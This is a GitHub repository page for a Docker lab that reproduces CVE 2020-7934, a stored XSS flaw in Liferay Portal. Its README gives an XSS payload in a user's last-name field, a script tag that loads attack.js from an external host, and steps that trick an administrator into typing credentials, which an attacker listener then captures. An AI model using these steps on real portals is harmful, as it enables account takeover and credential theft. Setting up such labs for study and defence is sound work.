Skip to content

Latest commit

 

History

History
 
 

vultarget

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Details.txt
Details.txt
 
 
README.md
README.md
 
 
api_attacker.py
api_attacker.py
 
 
attack.js
attack.js
 
 
docker-compose.yml
docker-compose.yml
 
 
simple_injection.js
simple_injection.js
 
 

README.md

CVE 2020-7934

How to run CVE

Requirements

  1. docker

Remarks

it's possible put the script attack online (given the js code ) http://yourjavascript.com/ Our Js script online for the attack html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

Commands for configuration

  1. go to root folder of this project
  2. run "sudo docker-compose up --build"
  3. new terminal: run "docker inspect liferay" ==> and copy the IPAddress value
  4. new terminal: run "python api_attacker.py"
  5. open a browser and go to "http://IPAddress:8080" ==> you should get the liferay portal as response
  6. to stop and delete containers use "sudo docker-compose rm"

Istructions for the attack

  1. Register in liferay as a user, log in, and in the "available sites" section, join the "liferay" site.
  2. Change the "last name" in a JS script (directly (<script>alert("xss")</script>) or through a "src =" http ... "")
  3. Log in as admin liferay (username: [email protected], password: test)
  4. Go to available sites and click on "liferay", the public page of this site will open.
  5. Go to the new page, a menu will open on the right, click on mermbership.
  6. Select the user registered in step 1. At that moment the script will be executed. 5.1) In the script attack.js the page will ask the credentials.
  7. In the terminal of step 5 ( of Commands for configuration) it will be printed username/password inserted in 5.1 ( by admin ) )